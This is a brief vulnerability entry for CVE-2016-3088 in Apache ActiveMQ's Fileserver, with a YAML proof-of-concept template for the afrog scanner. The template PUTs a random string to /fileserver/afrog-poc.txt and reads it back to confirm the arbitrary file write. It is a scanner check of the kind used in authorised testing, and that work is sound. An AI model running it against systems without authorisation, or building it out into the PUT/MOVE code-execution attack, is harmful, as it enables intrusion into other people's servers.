漏洞描述
The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
CVE-2016-3088: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
PoC代码[已公开]
id: CVE-2016-3088
info:
name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
author: fq_hsu
severity: critical
description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
reference:
- https://www.exploit-db.com/exploits/40857
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
set:
fileContent: randomLowercase(6)
rules:
r0:
request:
method: PUT
path: /fileserver/afrog-poc.txt
body: |
{{fileContent}}
expression: response.status == 204
r1:
request:
method: GET
path: /fileserver/afrog-poc.txt
expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
expression: r0() && r1()